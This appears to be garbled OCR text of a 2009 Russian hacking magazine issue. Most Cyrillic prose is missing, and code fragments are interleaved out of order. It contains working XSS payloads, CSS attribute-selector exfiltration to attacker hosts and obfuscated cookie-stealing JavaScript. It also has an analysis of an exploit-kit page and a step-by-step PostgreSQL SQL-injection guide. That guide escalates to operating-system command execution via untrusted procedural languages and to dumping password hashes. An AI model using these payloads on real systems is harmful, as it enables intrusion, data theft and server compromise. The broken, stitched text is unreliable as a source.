http_request.overrideMimeType(
'text/html');
}
}
else if (window.ActiveXObject)
{ // IE
try {

, , ,
JavaScript POST- .

CLICKJACKING
. ,

- , , .
,
,
. Flash
CSS. David Ross:

http_request = new ActiveXObject(


"Msxml2.XMLHTTP");
}
catch (e)
{
try {
http_request = new ActiveXObject(
"Microsoft.XMLHTTP");
}
catch (e)
{}
}

iframe,frame,object,applet {
border:1px solid #000 !important;
visibility:visible !important;
opacity: 1 !important;
filter: alpha(opacity=100)
!important;
position:absolute !important;
float:none !important;
overflow:auto !important;
....
}

}
if (!http_request) {
return false;

html
:

}
http_request.onreadystatechange = \
alertContents;
http_request.open('POST', url, true);
http_request.setRequestHeader(
"Content-type",
"application/x-www-form-urlencoded");
http_request.setRequestHeader(
"Content-length", parameters.length);
http_request.setRequestHeader(
"Connection", "close");
http_request.send(parameters);
}

,
X 10 /130/ 09

<html>
<head>
</head>
<body>
<image ISMAP style="position:
absolute;width:100%;height:10
0%;" onmousedown="this.style.
display='none'">
<iframe src="http://www.microsoft.
com" id=x type=text/html width=500
height=500 codetype=text/html
id=x></iframe></image>
</button>
</body>
</html>

XSS,
UTF-7.
GOOGLE 2005

.
,
. .

!
CSS2
CSS3 XSS
, .
Internet Explorer
JavaScript expression().
.
.
IE behavior. ,
,
. HTML:
<div style=behavior: url(/file.
htc)


:
<attach event="ondocumentready"
handler="parseStylesheets" />
<script language="JavaScript">
function parseStylesheets() {
alert(document.cookie + '\nONSEC.
ru security research team')
}
</script>


HTML; IE ,
. ,
XSS
- javascript. .
, XSS
, script,
behavior. ,
, XSS, behavior,
.
: http://xssed-site.com/search/q=<div
style="behavior:url(http://xssed-site.com/
admin/q=<attach event="ondocumentready"
handler="delUser(1)"/>)>

065

, XSS.
delUser(1) (
, ,
) ondocumentready.
, !
.
, moz-binding: url(http://
hackme.com/bindme.xml#xss).
XML,
JavaScript.
XML-:
<bindings xmlns="http://
www.mozilla.org/xbl"
xmlns:html="http://www.
w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XSS");
</constructor>
</implementation>
</binding>
</bindings>


FF3.5. ,
CSS. , , .

:
<style>
@import "http://xakepsite.com/xss.css"
</style>

,
, .

CSS3. , input, . CSS :
input[value*="\x10"]{
background:url("//xakepsite.
com/?h=\x10");
}

input[value*=\x7F]{
background:url(//attacker.
com/?h=\x7F);

}
? ,
10-7F, . ,
.
.
111
,
CSS .
, eaea.sirdarckcat.
net/cssar.

066

style=xss:&#92&#54&#53&#92&#55&#56
&#92&#55&#48&#92&#55&#50&#92&#54&#
53&#92&#55&#51&#92&#55&#51&#92&#54
&#57&#92&#54&#102&#92&#54&#101&#92
&#50&#56&#92&#54&#49&#92&#54&#99&#
92&#54&#53&#92&#55&#50&#92&#55&#52
&#92&#50&#56&#92&#51&#49&#92&#50&#
57&#92&#50&#57></div>
<!xss:expression(alert(1))-->


GOOGLE

DATA:TEXT/HTML

.
base64-. ,

. , , :
<iframe src="data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3Njcm
lwdD4K"></iframe>
<FRAMESET><FRAME SRC="data:text/htm
l;base64,PHNjcmlwdD5hbGVydCgnWFNTJ
yk8L3NjcmlwdD4K"></FRAMESET>
<OBJECT TYPE="text/x-scriptlet"
DATA="data:text/html;base64,PHNjc
mlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K"></OBJECT>


. , Internet
Explorer. text/html
.


- HTML
.
,
,
.
, :
<p/alt="noxss"onmouseover=alert(/
XSS/)>test</p>

Opera 10, IE 8, FF 3.5, Chrome Safari.


<style>@\69\6d\70\6f\72\74 '//
xakep-site.com/xss.css';</style>
<p style="f&#92;iltere&#92;d:
va&#92;lue"/>
<div style=f\il\te\r\ed:val\ue></div>
<div style=xss:\65\78\70\72\65\73\7
3\69\6f\6e\28\61\6c\65\72\74\28\31
\29\29></div>
<div

Opera 10, Chrome, Safari, IE 8, FF 3.5 (


expression, ,
IE).
Internet
Explorer 6. ,
.
antichat.ru. , JavaScript ,
document.
cookie, location.href, document.write .
.
JavaScript-,
JavaScript.
BlackHat 2009

alert(1) json-:
($=[$=[]][(____=!$+$)[_=-~-~~$]+({}+$)[_/_]+($$=($_=!+$)
[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](_/_)

, , ? . : http://oxod.ru/2009/08/26/-xss----.
document.cookie :
($=("+([]
['pop']))+");(_="+this);$$$
= _[11]+$[6]+$[3]+$[1]+'
m'+$[20]+$[2]+$[4];$$_ =
$[3]+$[6]+$[6]+"k+$[5]+$[20];
alert(this[$$$][$$_])

, , ,

document cookie. ,
,
JavaScript.

XSS,
-.
. ,

. ,

. ,
. oxod.ru. z
X 10 /130/ 09

X-Contest!

-
www.ring0cup.ru

WWW.RING0CUP.RU,

,
-

1. Xek0
2. JAcKiE
3. peretc89
4. ianepanda
5. mazalamo

X 10 /130/ 09

DEFENDER BERN 795



+ .
19



2,4



25

DEFENDER ZURICH 755



: 800 cpi / 1600 cpi
: 8
: 2

67


CR@WLER CRAWLER@XAKEP.RU

(
) ,
.
, ,
, .
:
vsprintf (), OllyDbg.

, . ,
,
writeable,
.
Microsoft
.
, SEH (.
Structured Exception Handling) ,

. ,
( . thread,
). , ,
,

(,
).
.

.
-

068

.
?
,
(
), FS:[0]. ,
,
,
, , .
FS:[0]
.
, .
,
,
- (
, ), .
; 0x0401000, ,
Hello, World!,
26h . ,
0x401026,

.

,
-
ex.exe OllyDbg (
, ,
00401026, LordPe
):
00401026 XOR EAX,EAX; EAX=0
00401028 PUSH 0040103A ;

0040102D PUSH DWORD PTR FS:[EAX]
;
00401030 MOV DWORD PTR
FS:[EAX],ESP; FS:[0]

00401033 CALL 00401033;

00401038 JMP SHORT 00401038;

0040103A POP EAX;

0040103B POP EAX;

0040103C POP ESP;


X 10 /130/ 09

OLLYDBG
VSPRINTF ()...

ESP
0040103D JMP SHORT 00401000;



( CALL 00401033
, ).
,
, ,
00401038, .
, EIP,
, ,

0x40103A.
00401038
. , JMP
. ,

0040103E,

,
,
.
, , JMP,
,
:
0040103D

DB EB

0040103E
ROL DWORD PTR DS:[EAX],0
; Shift constant out of range 1..31

,
JMP SHORT
00401000 X 10 /130/ 09

,
,

. :
,
:
; :
00401000 DB 6A
; CHAR 'j'
00401001 DB 00

... IMMUNITY !

00401020 JMP DWORD PTR DS:


[<&user32.MessageBoxA>]
; user32.MessageBoxA

:
00401026
00401028
0040102D

XOR EAX,EAX
PUSH ex_excep.0040103A
PUSH DWORD PTR FS:[EAX]

,
, FS:[0].
00401002 DB 68
; CHAR 'h'
00401003 DD ex_excep.00403000
; ASCII "Simply program"
00401007 DB 68
; CHAR 'h'
00401008 DD ex_excep.0040300F
; ASCII "Hello, World!"
0040100C DB 6A
; CHAR 'j'
0040100D ADD AL,CH
0040100F OR EAX,6A000000
00401014 ADD AL,CH
00401016 ADD BYTE PTR DS:[EAX],AL
00401018 ADD BYTE PTR DS:[EAX],AL
0040101A JMP DWORD PTR DS:
[<&kernel32.ExitProcess>]
; kernel32.ExitProcess

00401030

MOV DWORD PTR FS:[EAX], ESP

00401033

CALL ex_excep.00401033

00401038 JMP SHORT ex_excep.0040103E


;

:
0040103A DB 58
; CHAR 'X'
0040103B DB 58
; CHAR 'X'
0040103C DB 5C
; CHAR '\'
0040103D DB EB

069

PRINTF

0040103E ROL DWORD PTR DS:[EAX],0


; Shift constant out of range 1..31
00401041 JMP SHORT ex_excep.0040100F
;

, :

. , ,
,

,
,
0x401000.

printf
format, . printf vprintf
stdout; fprintf
vfprintf stream;
sprintf, snprintf, vsprintf vsnprintf str. vprintf, vfprintf, vsprintf, vsnprintf printf, fprintf, sprintf, snprintf,
, va_list, . va_end ,
ap .
va_end(ap). format, ,
( stdarg(3)) .


.
EIP,
.
, , , ,
. ,
.

VSPRINTF ()

,
-,

.
OLLYDBG !

070

,
.
, .
OllyDbg ,

vsprintf (),
msvcrt.
printf. www.opennet.
ru .
, %, , .
%s,
const char *
.
,
- (NULL).

vsprintf () OllyDbg? ,

, , vsprintf (), -
. ,
, ,
.

, , .

, , ,
. , , ,
API-

.
:). vsprintf ()
, %s, OllyDbg 1.10.

X 10 /130/ 09

IMMUNITY, OLLYDBG, .

! ,
.
OllyDbg.
, .

.
WIN32 OutputDebugString()
kernel32.dll.
OutputDebugStringA()
(
),
RaiseException(),
.
,
,
.
,
. ,
,
, <F7>
OutputDebugStringA()
, :
7C8024F9 PUSH EAX
7C8024FA
X 10 /130/ 09

MOV EAX,DWORD PTR SS:[EBP-4]


7C8024FD MOV DWORD PTR SS:[EBP-4],-1
7C802504
MOV DWORD PTR SS:[EBP-8], EAX
7C802507
LEA EAX,DWORD PTR SS:[EBP-10]
7C80250A MOV DWORD PTR FS:[0],EAX
7C802510 RETN


OutputDebugStringA()
.
,
:
RaiseException(
DWORD dwExceptionCode,
DWORD dwExceptionFlags,
DWORD nNumberOfArguments,
CONST DWORD *lpArguments
);

*lpArguments

OutputDebugStringA().
,
. .


, , ( ):
00401026 PUSH 00401033 ;

0040102B CALL OutputDebugStringA
;
00401031 JMP 00401000;

00401033 DB "%s%s",0 ; ,

,
, NativeAPI
( ,
, Stolen code,
PE-).

SYSENTER, -
,
, SoftIce. , .
,
. z

071


CR@WLER CRAWLER@XAKEP.RU

, JAVASCRIPT, !

072

-
GOOGLE

X 10 /130/ 09


, , , , .
, , ,
. -.

-,
ESET
NOD32 trojandownloader.iframe.ey.gen.

DVD, ,

. -
.
,
,

.
html-, ,
,
, <script
language="javascript"> </script>
javascript-.
: , , ,
-,
,
.
, .

.
,
.
-
, , X 10 /130/ 09


.
javascript-beautifier,
http://jsbeautifier.org (
- , ,
DVD:
).
, , ,
(
):
function Strange_Function(
string_parameter)
{
var String_withoutUpcase =
arguments.callee.toString().
replace(/\W/g, '').toUpperCase();//

//
// "M6Nnm6jY0", eval ()
eval(M6Nnm6jY0); //

}
Strange_Function('...

-...'); //

,
-. ,
,
javascript-
. ,
, .
,
, .

JAVASCRIPT?
!
,
, , .
Mozilla Firefox,
,
. ,
java.
, Firebug, .
,
,

HTML-. , .
, -
, ,
,
.
, , ,

073

, . ,
: ,
,
, ,
.
- ,
,
,
.

,
.
, java-,
,
.
Sandboxie

java-.
:
,
.
,
,
-, javascript. , , ,
javascript- ( ,
).
, .
, .
Sandboxie,
(,
Sandboxie ,
,

074

). ,
,
, Firebug

. ,
Google. , . Firebug
,
.
Firebug
(Script ;
,
Firebug). , .
.

,
. , ,
.
java- ,
:
r = CLSID.CreateObject(name); CLSID.
CreateObject is not a function.


-
.
java-,
,
,
eval (),
.
java-.
,
Firebug, , .

,
( ; , ,
Firebug
). - .
, ,
oD2vKFj61. .
ud7a00v7W.
,
,
,
eval (ud7a00v7W).
, .
...
(ud7a00v7W). .
.
-
.
. ,

. ,
,
,
(
,
). ,
, ,
:
var t1jXcSnPQ=arguments.callee.
toString().replace(/\W/g,'').
toUpperCase();

, ,
t1jXcSnPQ
. callee arguments

(toString()) ,

. , .

javascript- ,
html-, .
,
VALUE
TEXT - ,

,

. javascript-
,
.
X 10 /130/ 09

SANDBOXIE !


- ,
,
, , ,

.
- ,

.
; ,

, , .
,
:
if (n0lterOf() || DnCWiFOj()
|| SOhxTHtY() || u5r_Qafm() ||
Fv2QJVho() || uzbeukYW() ||
bF4sn2HS()) { }
setTimeout("window.location =
'http://www.google.com'", 5000);

( :
http://www.kb.cert.org/vuls/id/234812). yXjO37yr()
C:\win....exe ( ).
http://guuatwe.com/
in.cgi?02010258020000000019f696fa242c14658
1fe980f.
2) DnCWiFOj():
,
unescape-, ,
.
3) SOhxTHtY():
ActiveXObject-
( TrojanDownloader.Win32.Tiny).

4) u5r_Qafm():
ActiveX America
Online SuperBuddy (memory corruption).
.
5) Fv2QJVho ():
,
NCTAudioFile2.dll
NCTSoft NCTVideoStudio.
(CLSID) 77829F14-D911-40FF-A2F0D11DB8D6D0BC.
6) uzbeukYW():
, GOM
Player 2.1.6.3499 ,

.
ActiveX- GomWebCtrl.GomManager.1 (GomWeb3.
dll) OpenURL().

( 500 ),
.
7) bF4sn2HS():
, ,
ActiveX- Microsoft
Access Snapshot Viewer-.

, Internet Explorer.

, , , Internet Explorer,
-,
.
,
: . ,
, . ! z

,
Google; ,
.
. , -
, .
,

.
.
1) n0lterOf():
ActiveX-
X 10 /130/ 09

075


SPYDER SPYDER@ANTICHAT.NET


SQL-INJECTION POSTGRESQL
, , ,
MySQL, , , Oracle. , PostgreSQL
Oracle Sybase ,
, .
UNION,

, .
SELECT id,title,text,is_enable FROM
news WHERE id=$id;

,
, MySQL:
id=1 ORDER BY 1
id=1 ORDER BY 99

Query failed: ERROR: ORDER BY


position 5 is not in select list

id (int)
title (text)
text (text)
is_enable (boolean)


. 4. :
id=-1 UNION SELECT
null,null,null,null

, , :
id=-1 UNION SELECT
null,null,null,123


, , :
id=1 ORDER BY 1,2,3,4,5,...,99

076

MySQL
,
UNION.
:

Query failed: ERROR: UNION types


boolean and integer cannot be
matched
X 10 /130/ 09

,
text char.


, , (..
), :
id=-1 UNION SELECT
null,null,urrent_user,null

:
id=-1 UNION SELECT
null,null,current_
database()||':'||version(),null

. ,
:
current_database()
version() MySQL PostgreSQL

-,
||, concat()
MySQL. , -,
:, .
:
sitedb:PostgreSQL 8.3.7 on x86_64redhat-linux-gnu, compiled by GCC
gcc (GCC) 4.1.2 20071124 (Red Hat
4.1.2-42)

, PHP,
addslashes(), php.ini
magic_quotes_gpc.
1. chr()
chr() n integer
ASCII-, n. -
: :

, POSGRESQL

. .
2. $text$
PostgreSQL ,
.
. :
id=-1 UNION SELECT
null,null,current_database()||$tex
t$:$text$||version(),null

, text
:).


, :
id=-1 UNION SELECT null,null,usena
me||':'||cast(usesysid+as+text)||
':'||cast(usecreatedb+as+text)||'
:'||cast(usecatupd+as+text)||':'|
|cast(usesuper+as+text),null FROM
pg_user WHERE usename=current_user

,
admin:16385:true:true:true

id=-1 UNION SELECT


null,null,current_database()||$$:$
$||version(),null


, PosgreSQL
.
, .
1. pg_user
, . , .
:
usename (
name)
usesysid ID ( int)
usecreatedb
( boolean)
usecatupd
( boolean)
usesuper
superuser ( boolean)


cast(), , , MySQL, . inttext booleantext.
2. pg_shadow
, , /etc/
shadow, *nix-.
! pg_shadow, pg_user,
.
:
id=-1 UNION SELECT null,null,usenam
e||':'||passwd,null FROM pg_shadow
WHERE usename=current_user
admin:md5db55162d9e34e895d45a084f1
5726371

, pg_shadow
usesuper.
3. pg_language
, -

id=-1 UNION SELECT


null,null,current_database()||chr(
58)||version(),null

,
. , .

BACK-CONNECT'A.
POSTGRES
X 10 /130/ 09

POSTGRESQL

077

PostgreSQL
';'.
:
id=10;SELECT 123


, .
. text
boolean , :
id=10;SELECT CAST(version() AS boolean)

HACKING WITH POSTGRESQL


WWW.DEPESZ.COM

WARNING

info
!

! ,

!

.
,
:
lanname ( name)
lanispl ,
false sql ( boolean)
lanpltrusted
( boolean)

...
INFORMATION_SCHEMA!
, PostgreSQL
MySQL > 5.0 information_schema,

, .
.
:
id=-1 UNION SELECT null,null,table_name,null
FROM information_schema.tables LIMIT 1 OFFSET
0

, limit PostgreSQL :
LIMIT , .
OFFSET , (0 ).
, , users. :
id=-1 UNION SELECT null,null,column_name,null
FROM information_schema.columns WHERE table_
name='users' LIMIT 1 OFFSET 0

, , MySQL ( limit offset).


UNION.
.
,
usesuper. ,
, MySQL.

078

Query failed: ERROR: invalid input syntax for


type boolean: "PostgreSQL 8.3.7 on x86_64redhat-linux-gnu, compiled by GCC gcc (GCC)
4.1.2 20071124 (Red Hat 4.1.2-42)"

,
name. , :
id=10;SELECT+CAST(usename AS boolean) FROM
pg_user


ERROR: cannot cast type name to boolean

, text
boolean. ?
id=10;SELECT CAST(CAST(usename AS text) AS
boolean) from pg_user

name text, text


boolean. :
Query failed: ERROR: invalid input syntax for
type boolean: "admin"

. ,
limit offset.
where columnname not in (). ,
admin.
:
id=10;SELECT CAST(CAST(usename AS text) AS
boolean) FROM pg_user WHERE usename NOT IN
('admin')

,
. , ,
. boolean
. :
Values of the boolean type cannot be cast
directly to other types (e.g., CAST (boolval AS
integer) does not work)

, , :
X 10 /130/ 09

id=10;SELECT CAST(usesuper AS text)


FROM pg_user


.
, ? , .

name,text,char,
. .
union, ,
.
.
cast()
,
'::'.
:
id=10;SELECT (table_
schema||':::'||table_
name)::text::boolean FROM
information_schema.tables


SQL- . :
SELECT id,title,text
FROM news
WHERE id=$id
AND is_enable=TRUE

--
,
.
SQL-Injection,
.
:
Id=10;SELECT version()::int;SELECT
id FROM news WHERE 1=1

PHPPGADMIN. PMA POSTGRESQL

,
,
:
Id=10;SELECT version()::int;SELECT
1 FROM pg_user WHERE 1=1 or 2=2

USESUPER

LIMIT? NO LIMIT
limit not in (),
.
, plpgsql,
, usesuper,
:
id=10;CREATE LANGUAGE 'plpgsql'

,
:
SELECT usesuper FROM pg_user WHERE
usename=current_user

true. ,

.
, PostgreSQL
,
.

PGSQL-BUGS

id=10;CREATE OR
REPLACE FUNCTION getall
(text,text,text,text,text,text)
RETURNS text AS $func$
DECLARE
schema
table
column1
column2
column3
column4
count
i
temp
int_test
input_refc

ALIAS
ALIAS
ALIAS
ALIAS
ALIAS
ALIAS

FOR $1;
FOR $2;
FOR $3;
FOR $4;
FOR $5;
FOR $6;
int;
int;
text;
text;
refcursor;

BEGIN
int_test := '';
OPEN input_refc FOR EXECUTE
$qr$SELECT count($qr$ || quote_
ident(column1) || $qr$) from $qr$ ||
quote_ident(schema) || $qr$.$qr$ ||
quote_ident(table);
FETCH input_refc into count;
CLOSE input_refc;
count := count 1;
BEGIN
FOR i in 0..count LOOP
OPEN input_refc FOR
X 10 /130/ 09

079

UDF-
POSTGRESQL...

EXECUTE $qr$SELECT $qr$


|| quote_ident(column1)
|| $qr$||chr(58)||$qr$ ||
quote_ident(column2) ||
$qr$||chr(58)||$qr$ ||
quote_ident(column3) ||
$qr$||chr(58)||$qr$ ||
quote_ident(column4) ||
$qr$||$sep$<BR>$sep$ FROM $qr$ ||
quote_ident(schema) || $qr$.$qr$
|| quote_ident(table) || $qr$
LIMIT 1 OFFSET $qr$ || i;
FETCH input_refc into temp;
CLOSE input_refc;
int_test := int_test || temp;
END LOOP;
RETURN int_test;
END;
END;
$func$ LANGUAGE plpgsql;

6 , ,
4 .
:
id=10;SELECT getall('pg_
catalog','pg_user','usename',use
sysid,usesuper,passwd)::int

... :)

.
id=10;SELECT file::boolean FROM
filetbl


.
.

where file not in(), ,
UNION limit 1 offset n.


,
.
:
id=10;COPY (SELECT 'I like it') TO
'/tmp/pgtest.txt'

Query failed: ERROR: reference


to parent directory ("..") not
allowed


PostgreSQL

.
:
C pure c,
plperl Perl
plpython Python
pltcl TCL

, , plPHP, plRuby
plJava. usesuper,
.
, ,
pg_language. :

:
hacker:16384:false:********
nobody:16385:true:********
park:16386:true:********
postgres:10:true:********
reader:16387:false:********
sa:16388:true:********


,
.
text:
id=10;CREATE TABLE filetbl(file
text)

/etc/
hosts :
id=10;COPY filetbl FROM '/etc/hosts'

080

-rw-r--r-- 1 postgres postgres


10 Aug 31 19:14 pgtest.txt

, PostgreSQL
, ,
,
. ,
:
pg_read_file
pg_ls_dir


, , $PGDATA,
.
Query failed: ERROR: absolute path
not allowed

id=10;SELECT (lanname,lanispl,lan
pltrusted)::text::boolean FROM pg_
language WHERE lanname='plperl'


, , :
Query failed: ERROR: invalid
input syntax for type boolean:
"(plperl,t,t)"

, plperl
, .
, .
. ,
text
.
:
X 10 /130/ 09

UNION.

id=10;CREATE OR REPLACE FUNCTION


ret (text) RETURNS text AS 'return
revers($_)' LANGUAGE 'plperl'

, INTEGER

:
id=10;SELECT ret('hello')::boolean

:
Query failed: ERROR: invalid input
syntax for type boolean: "olleh"

, , .
,
.
lanpltrusted.
system(), print ``
open() :
Query failed: ERROR: creation
of Perl function "ret" failed:
'system' trapped by operation mask
Query failed: ERROR: creation
of Perl function "ret" failed:
'quoted execution (``, qx)'
trapped by operation mask
Query failed: ERROR: creation of
Perl function "ret" failed: 'open'
trapped by operation mask


, .

Perl.
pg_pltemplate.
, :
id=10;CREATE LANGUAGE 'plperlu'

pg_language
plperlu, lanpltrusted false,
u (Untrusted).
,

:
X 10 /130/ 09

id=10;CREATE OR REPLACE
FUNCTION sys (text) RETURNS
text AS 'open(FL, "$_ |");print
join("",<FL>)' LANGUAGE 'plperlu'


dblink(). SQL-. :

:
id=10;SELECT sys('id')::boolean

:
Query failed: ERROR: invalid
input syntax for type boolean:
"uid=26(postgres) gid=26(postgres)
groups=26(postgres)

.
, , postgres.

:
Python:
id=10;CREATE OR REPLACE FUNCTION
sys (text) RETURNS text AS 'import
os; return os.popen(args[0]).
read()' LANGUAGE 'plpythonu'
TCL
id=10;CREATE OR REPLACE FUNCTION
sys (text) RETURNS text AS 'exec
$1' LANGUAGE 'pltclu'
C
id=10;CREATE OR REPLACE FUNCTION
sys (cstring) RETURNS text AS '/
lib/libc.so.6', 'system' LANGUAGE
'C' STRICT

DBLINK() TRUST


, -

SELECT * FROM
dblink('host=127.0.0.1
user=someuser
password=somepass
dbname=somedb',
'SELECT column FROM sometable')
RETURNS (result TEXT);

,
.
PostgreSQL .
? dblink()

.
:
id=10;SELECT * FROM
dblink('host=127.0.0.1
user=postgres db=somedb','SELECT
passwd from pg_shadow') RETURNS
(result text)

, , .

OUTRO

PostgreSQL,
.

postgresql.org, ...
e-mail :) z

081


R0ID R0ID@BK.RU

X-TOOLS

: FTP INDEXER CLASS
: *NIX/WIN
: SHARKY

[file] => Array (


[0] => blablabla.com.txt
[1] => blablabla2.com.txt
[2] => blablabla3.com.txt
)

- , , )

3. :
$ftpic->find([ ], [ ]);

:
$ftpic->find("phpmyadmin", "/");

- :)
,
-.
,
:). , ,
PHP- Sharky FTP Indexer Class.

. , :
1. :
$ftpic = new FtpIC([], [],
[], [], [], [ ]);

:
$ftpic = new FtpIC("blablabla.com",
21, 10, "admin", "12345", true);

TRUE, FALSE.
2. :
$ftpic->tree([ ],
[ ]);

:
$ftpic->tree("/www/", 2);

:
[stats] => Array (

082

Array (
[0] => /blablabla.com/phpmyadmin/
[1] => /blablabla2.com/phpmyadmin/
[2] => /bck/phpmyadmin.txt
)

, .
:).
P.S.
.

: CFM
: *NIX
:

,
,

. , CFM aka Complex For
Monitoring, .

,
, OpenSource.
snmp-
-. ,
, :




CFM


, :
mysql
apache
postfix (
)
mailx
Perl-:
DBI, Net-SNMP, Net-DNS, net-ping,
MailTools, MIME-Lite, MIME-Base64,
XML-XPath, XML-Parser

,
UTF-8,
(
):
./cfm_install.pl -p <mysql_root_
password>


:
cfm_cfg

cfm_mon
cfm_traps

cfm_cfg :
DEVCFG

SNMPCFG
OID
SNMPVAL
DEVSTS

ALARMCFG X 10 /130/ 09


GRAPHCFG

USERS .

CROSSID .
OFFICE ,

TEMPRCFG
CROUPS
MIBFILE
MIB
mib2
entrtprises
clns
snmpDomains
snmpProxys
snmpModules

-:
cfmroot , , : t25r8sts
cfmuser ,
-, : cfm

, CFM.
/etc/
init.d/cfm start.
-
: cfmadmin.xpi cfmuser.xpi.

:
CFM admin
CFM view


,
. ,

, , , .
P.S. .


http://fireforge.net/projects/cfm.

:
MULTI PASSWORD RECOVERY
: WINDIWS 95/98/ME/2000/2003/
XP/VISTA
:


, , , ,
, ,
:).
,
. , Multi Password
X 10 /130/ 09

Directory Opus (mostly all versions)


FTP Uploader (mostly all versions)

2. E-mail-:

:)
Recovery .

portable- ,

...
:


(aka
)

SAM-

1. FTP-:
Windows/Total Commander 4.x, 6.x
FAR Manager 1.6x, 1.7x
WS_FTP 5, 6, 7, 8, 9, 10 Home/Pro, 2007
CuteFTP Home/Pro (mostly all
versions)
FlashFXP 1.x-3.x
FileZilla 2.x
FTP Commander Pro/Deluxe (mostly
all versions)
FTP Navigator (mostly all
versions)
BulletProof FTP Client 1.x, 2.x
SmartFTP 1.x, 2.x
TurboFTP 5
FFFTP 1.x
CoffeeCup FTP 3.x
Core FTP 2.x
FTPExplorer 7.x
Frigate3 FTP 3.x
UltraFXP 1.x
FTPRush 1.x
SecureFX (mostly all versions)
Web Site Publisher 2.1.0
BitKinex 3.0.8
ExpanDrive 1.8
Classic FTP PC (mostly all versions)
Fling (mostly all versions)
SoftX FTP Client (mostly all
versions)

Outlook Express 6.0


Outlook 2000 (MSO 2000), 2002 (MSO
XP), 2003 (MSO .NET), 2007
Mozilla Thunderbird 1.0
The Bat! v. 1.x, 2.x, 3.x
Becky 2.x
Eudora/Eudora Light (mostly all
versions)
Gmail Notifier (mostly all versions)
Mail.Ru Agent 4.x
Opera Email Client
IncrediMail (mostly all versions)
Group Mail Free (mostly all
versions)
Vypress Auvis 2.x
PocoMail 3.x, 4.x
Forte Agent 3.x
iScribe/nScribe 1.x
POP Peeper 3.x
Mail Commander 8.x
Windows Mail (mostly all versions)
Windows Live Mail (mostly all
versions)

,
IM-
.

: AUTOCLICKEXTREME
: WINDIWS 2000/XP
: SHER-KHAN-SOFT

, , :).
, .
-,


. AutoClickExtreme.

:
/

,








, .
,
. z

083


MIFRILL MIFRILL@REAL.XAKEP.RU

,
CHAOS CONSTRUCTIONS (CC)
- , CC
LAN-,
. , CHAOS
CONSTRUCTIONS
,
. ,
,
.

084

X 10 /130/ 09

Chaos Constructions 09,


,

.
, ,



,
.

70-80- .
,
.
,
.
ZX Spectrum, Commodore 64, Amiga Atari,

,
.

, ,
.
-, ,
.
, , , ,
,
( X 10 /130/ 09

).
, ,
,
,
.
,
,
(
), - ,
. ,
- .
, , ,


.
Chaos Constructions 1995, EnLight,
-.
,
,
, ,
,
.

-.

-
,

, - NVidia
, . ,
Chaos Constructions
,
, -,

( ). , ,
CC
, ,
, .
,
2009 Oldayn, Frog Random;
,
.

20 .

Chaos Constructions
,
- .

, , ,
, , ,

. ,

(
),
.
CC , 10 ,
,
.
, ,
, Chaos Constructions
,

085

,
. , ,
,

, ,
, .
-
: -
( ,
,
, ,
, ), -
, -
,

. -

, ,
.

, 2007-2008
. ,
,

, .

Dlinyj ,
,
CC,
,
,
, .

,
,

.
,
, , ,

086

CC, ,

30 .

,
,
,
. ,
-, , ,

.
, CC
Assembly, .
,
CC09

,
,
.
,
.

NeoGS,
,

.
, 4- 8
bit snail svo. ,
,

06,
,
,
:).
Combined 64k Intro
Write
me, please f0x.
Combined Demo
( 16 )
Digere animo demarche,


,
,
.
, ,

,
,

.

,
, ,
,
,
.

,


CC09.
,
-, -

Yes we can Quite,



Combined 4k Intro
,
. Yes we can

,
,
,

.
. , CC09,
,
-
4k Intro.
, ,
.
ZX 640k Demo
The Link Alone
Coder Invaders8,
,

. ,
-

,
,

.
JavaFX demo
. -
,
, JavaFX
HyperSphere, Sun Microsystems.
Eustas Express JavaFX
Demo.
,

.
, ,
,

,
ZX-, ,

.

.
,
,

. ,
,
CC ,
(, , ),

Chaos Constructions :).

X 10 /130/ 09

:

-
UNIX-.

,
( , ),
.
. -
,


.

Positive Technologies,
-



Web
Application Firewall
Bitrix.
WAF,
SQL-, XSS
Local File Including.
,
:
,
;).
,
-
. ,

, .

) ,
,
-
Seans okon4en. Piz***te otsuda
=) Hacked_for_CC_09.
- -
.
http://openvpn.cc.

Xakep9009.

WEP- ( , ,
),
iPhone.
, WEP

-

-,
.

,
( , ,

?), ,
, .


,

,
.
d0znp, ONsec.ru
1C Bitrix 8.0.5 + WAF
XSS + Memory leak.

CC
.
Chaos
Constructions
- ,
, HackQuest.


,
, Toxa,

.
,
,

HackQuest :

-
.
,
,
.
,
( -
. . mifrill)
,
,
.
,
!

,
X 10 /130/ 09


web-.

Sun Microsystems: ,


,
. -

. ,

:
- -
,
,
, -!


-,
.

HackVideo.
- ,
,

.

:
XENON and
SmallBag EasyHack.

(-,

Chaos
Constructions
,
.
,

, ,

087

,
, ,
.

, , , ,

. , ,
CC , ,
:
,
- .

,
,
. ,
,
. ,
CC Easy John (http://
easyjohn.livejournal.com)
(http://www.leningrad.su/museum).
,
, : ,

CC09.
, ... Dlinyj, ,
,
, RFID-.
, ,
, Intel

.
, . , Amiga, Commodore Atari.

, .
, overclockers.
ru (

088

,
).
,
Chaos Constructions Real-time
Hardware Hack. ,
.
:

, 1-3 .
( , ),
.
,

,
.
. , , ,
, , .
,

. ,
, !
,
, .
,
, ,
? :)
,
,
, . - ,
- , .
, , ,
, ! :
(voice.el) 19:13; 13:58; NOOP
() 12:15 ( ,

. 59
59 ).

, ,
. ,
Chaos Constructions
. , Web Application
Firewall
JavaFX. -

ReactOS; ;

Sceneart history
(2D)
, , ,
.

- (
,
, , CD/DVD ).
,
, ,
, .
,
; , - , ;
, ,
. ,
Chaos Constructions, ,
. ,
,
2010 , , ,
.
? z
X 10 /130/ 09

UNIXOID
ZOBNIN@GMAIL.COM



,
. , , , . tar.gz
CVS-? ? ,
configure? ?
?
.





BSD

,

.

:
.



.

tar.gz tar.bz2 (
tar.lzma) .

.

090

$ tar xvzf ..tar.gz

$ tar xvjf ..tar.bz2

: *nix-
tar -j,
: bunzip2 < ..tar.bz2 |
tar xvf -.

.

( !),
.
,
.
,
// .
,
VCS-
.
VCS (
, CVS,

Subversion, Git, Hg )

.
, ,
15 , (VCS

),
- , .

VCS , , ,
:

,
.
,
,


:
CVS ,
:
$ sudo apt-get install cvs
$ cvs -z3 -d:pserver:anonymous@
cvs.bochs.sf.net:/cvsroot/bochs
checkout bochs
X 10 /130/ 09

Subversion , sf.net code.google.com:


$ sudo apt-get install subversion
$ svn checkout http://inferno-ds.
googlecode.com/svn/trunk/ infernods-read-only

Git Linux-,
kernel.org github.com:
$ sudo apt-get install git-core
$ git clone git://github.com/
